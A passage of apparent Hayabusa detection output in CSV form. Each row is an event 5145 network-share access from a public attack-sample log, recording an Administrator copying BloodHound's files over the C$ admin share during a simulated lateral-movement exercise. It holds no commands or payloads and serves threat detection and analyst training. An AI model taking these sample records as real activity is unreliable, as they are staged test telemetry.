Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: 
\??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : 
Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 
Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File 